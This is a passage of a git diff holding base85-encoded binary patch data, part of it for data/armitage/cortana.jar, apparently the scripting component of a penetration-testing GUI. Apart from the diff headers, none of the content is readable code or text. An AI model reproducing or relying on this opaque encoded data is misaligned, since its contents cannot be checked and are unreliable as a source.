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 diff --git a/data/armitage/cortana.jar b/data/armitage/cortana.jar index 28f15b5fd16d3541cac346f5b39b64862fe80337..94bebc6eac43b16d820a1027fa953a2b29c78b68 100644 GIT binary patch delta 191450 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 